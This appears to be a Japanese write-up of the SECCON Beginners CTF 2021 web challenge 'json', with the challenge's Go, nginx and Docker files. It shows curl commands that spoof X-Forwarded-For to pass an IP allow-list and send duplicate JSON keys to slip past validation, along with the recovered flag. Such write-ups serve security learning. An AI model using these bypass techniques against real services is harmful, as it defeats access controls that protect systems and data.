	"github.com/gin-gonic/gin"
)

type Info struct {
	ID int `json:"id" binding:"required"`
}

// check if the accessed user is in the local network (192.168.111.0/24)
func checkLocal() gin.HandlerFunc {
	return func(c *gin.Context) {
		clientIP := c.ClientIP()
		ip := net.ParseIP(clientIP).To4()
		if ip[0] != byte(192) || ip[1] != byte(168) || ip[2] != byte(111) {
			c.HTML(200, "error.tmpl", gin.H{
				"ip": clientIP,
			})
			c.Abort()
			return
		}
	}
}

func main() {
	r := gin.Default()
	r.Use(checkLocal())
	r.LoadHTMLGlob("templates/*")

	r.GET("/", func(c *gin.Context) {
		c.HTML(200, "index.html", nil)
	})

	r.POST("/", func(c *gin.Context) {
		// get request body
		body, err := ioutil.ReadAll(c.Request.Body)
		if err != nil {
			c.JSON(400, gin.H{"error": "Failed to read body."})
			return
		}

		// parse json
		var info Info
		if err := json.Unmarshal(body, &info); err != nil {
			c.JSON(400, gin.H{"error": "Invalid parameter."})
			return
		}

		// validation
		if info.ID < 0 || info.ID > 2 {
			c.JSON(400, gin.H{"error": "ID must be an integer between 0 and 2."})
			return
		}

		if info.ID == 2 {
			c.JSON(400, gin.H{"error": "It is forbidden to retrieve Flag from this BFF server."})
			return
		}

		// get data from api server
		req, err := http.NewRequest("POST", "http://api:8000", bytes.NewReader(body))
		if err != nil {
			c.JSON(400, gin.H{"error": "Failed to request API."})
			return
		}
		req.Header.Set("Content-Type", "application/json")
		client := new(http.Client)
		resp, err := client.Do(req)
		if err != nil {
			c.JSON(400, gin.H{"error": "Failed to request API."})
			return
		}
		defer resp.Body.Close()
		result, err := ioutil.ReadAll(resp.Body)
		if err != nil {
			c.JSON(400, gin.H{"error": "Failed to request API."})
			return
		}

		c.JSON(200, gin.H{"result": string(result)})
	})

	if err := r.Run(":8080"); err != nil {
		panic("server is not started")
	}
}
server {
  listen    80;
  listen [::]:80;
  server_name localhost;

  location / {
    proxy_pass  http://bff:8080;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
  }

  error_page  500 502 503 504 /50x.html;
  location = /50x.html {
    root  /usr/share/nginx/html;
  }

}
FROM nginx:latest

COPY default.conf /etc/nginx/conf.d/default.conf
version: "3"

services:
 nginx:
  build: ./nginx
  ports:
   - 80:80
 bff:
  build: ./bff
 api:
  build: ./api
  environment:
   - FLAG=FAKE{this_is_fake_flag}

まずは、送信元IPアドレスを判断している箇所を確認したところ、以下の箇所で判定しています。

func checkLocal() gin.HandlerFunc {
	return func(c *gin.Context) {
		clientIP := c.ClientIP()
		ip := net.ParseIP(clientIP).To4()
		if ip[0] != byte(192) || ip[1] != byte(168) || ip[2] != byte(111) {
			c.HTML(200, "error.tmpl", gin.H{
				"ip": clientIP,
			})
			c.Abort()
			return
		}
	}
}

func main() {
	r := gin.Default()
	r.Use(checkLocal())
	r.LoadHTMLGlob("templates/*")

	r.GET("/", func(c *gin.Context) {
		c.HTML(200, "index.html", nil)
	})

nginxの以下の設定を確認したところXFF(X-Forwarded-For)を設定しているため、curlコマンドでXFF(X-Forwarded-For)ヘッダを設定したら送信元IPアドレスを作業できます。

  location / {
    proxy_pass  http://bff:8080;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
  }

そのため、以下のcurlコマンドを実行します。

$ curl https://json.quals.beginners.seccon.jp/ -H "X-Forwarded-For: 192.168.111.1"
<!DOCTYPE html>
<html>
 <head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Internal Website / 内部ページ</title>
  <link
   rel="stylesheet"
   href="https://cdn.jsdelivr.net/npm/bulma@0.9.2/css/bulma.min.css"
  />
 </head>

 <body>
  <section class="section">
   <div class="container">
    <h1 class="title">Internal Website / 内部ページ</h1>
    <p class="subtitle mt-1">
     You can get special information in this page.
    </p>
    <div class="field">
     <label class="label">Select item</label>
     <div class="control">
      <div class="select">
       <select id="item">
        <option>Quick brown fox</option>
        <option>Lorem ipsum</option>
        <option>Flag</option>
       </select>
      </div>
     </div>
    </div>
    <div class="field is-grouped">
     <div class="control">
      <button id="submit" class="button is-link">Submit</button>
     </div>
    </div>
    <div id="message"></div>
   </div>
  </section>
  <script>
   let submit = document.getElementById("submit");
   let message = document.getElementById("message");
   submit.addEventListener("click", (event) => {
    message.innerHTML = "";
    let xhr = new XMLHttpRequest();
    xhr.open("POST", "/");
    xhr.setRequestHeader("Content-Type", "application/json");
    xhr.onload = () => {
     if (xhr.status === 200) {
      message.innerHTML =
       '<article class="message is-success"><div class="message-header"><p>Success</p></div><div class="message-body">' +
       JSON.parse(xhr.response).result +
       "</div></article>";
     } else {
      message.innerHTML =
       '<article class="message is-danger"><div class="message-header"><p>Error</p></div><div class="message-body">' +
       JSON.parse(xhr.response).error +
       "</div></article>";
     }
    };
    data = JSON.stringify({
     id: document.getElementById("item").selectedIndex,
    });
    xhr.send(data);
   });
  </script>
 </body>
</html>

取得したHTMLをブラウザを表示すると、以下の画面が表示されました。
「Flag」を選択して、送信(Submit)をするとフラグが表示されるように思われます。
SECCON Beginners CTF 2021_web_check_json(3)

どのようなデータを送信したらいいか確認するため、再度提供されたプログラムを確認します。
以下のプログラムにidが2の時にフラグが表示される旨の記載がありましたので、idが2のデータを送ります。

func main() {
	r := gin.Default()

	r.POST("/", func(c *gin.Context) {
ーーーーーーーーーー(中略)ーーーーーーーーーー
		if id == 2 {
			// Flag!!!
			flag := os.Getenv("FLAG")
			c.String(200, flag)
			return
		}

		c.String(400, "No data")
	})

しかし、以下のようにエラーが出力されてしまいました。

$ curl https://json.quals.beginners.seccon.jp/ -X POST -H "X-Forwarded-For: 192.168.111.1" -H "Content-Type: application/json" -d "{\"id\": 2}"
{"error":"It is forbidden to retrieve Flag from this BFF server."}


以下のプログラムでエラーになってしまいます。

func main() {
	r := gin.Default()
	r.Use(checkLocal())
	r.LoadHTMLGlob("templates/*")
ーーーーーーーーーー(中略)ーーーーーーーーーー
		if info.ID == 2 {
			c.JSON(400, gin.H{"error": "It is forbidden to retrieve Flag from this BFF server."})
			return
		}


そのため、bffにはid=0,apiにはid=0を指定するように以下のcurlコマンドを実行すると、フラグが表示されました。

$ curl https://json.quals.beginners.seccon.jp/ -X POST -H "X-Forwarded-For: 192.168.111.1" -H "Content-Type: application/json" -d "{\"id\": 2, \"id\": 0}"
{"result":"ctf4b{j50n_is_v4ry_u5efu1_bu7_s0metim3s_it_bi7es_b4ck}"}


SECCON Beginners CTF 2021に関する記事

SECCON Beginners CTF 2021についての関連記事は以下の通りです。
必要に応じて、ご確認ください。

Noタイトル記事の概要
1SECCON Beginners CTF 2021 writeup以下のカテゴリの問題のwriteupを記載します。
【カテゴリ:welcome】
 ・welcome
【カテゴリ:crypto】
 ・imple_RSA
【カテゴリ:reversing】
 ・only_read
 ・children
【カテゴリ:pwnable】
 ・rewriter
【カテゴリ:web】
 ・osoba
【カテゴリ:misc】
 ・git-leak
 ・Mail_Address_Validator
2SECCON Beginners CTF 2021 writeup
(crypto:simple_RSA)
cryptカテゴリのsimple_RSAの問題の
writeupを記載します。
3SECCON Beginners CTF 2021 writeup
(crypto:Logical_SEESAW)
cryptカテゴリのLogical_SEESAWの問題の
writeupを記載します。
4SECCON Beginners CTF 2021 writeup
(crypto:GFM)
cryptカテゴリのGFMの問題の
writeupを記載します。
5SECCON Beginners CTF 2021 writeup
(crypto:Imaginary)
cryptカテゴリのImaginaryの問題の
writeupを記載します。
6SECCON Beginners CTF 2021 writeup
(web:Werewolf)
webカテゴリのWerewolfの問題の
writeupを記載します。
7SECCON Beginners CTF 2021 writeup
(web:check_url)
webカテゴリのcheck_urlの問題の
writeupを記載します。
8SECCON Beginners CTF 2021 writeup
(web:json)
webカテゴリのjsonの問題の
writeupを記載します。
9SECCON Beginners CTF 2021 writeup
(web:cant_use_db)
webカテゴリのcant_use_dbの問題の
writeupを記載します。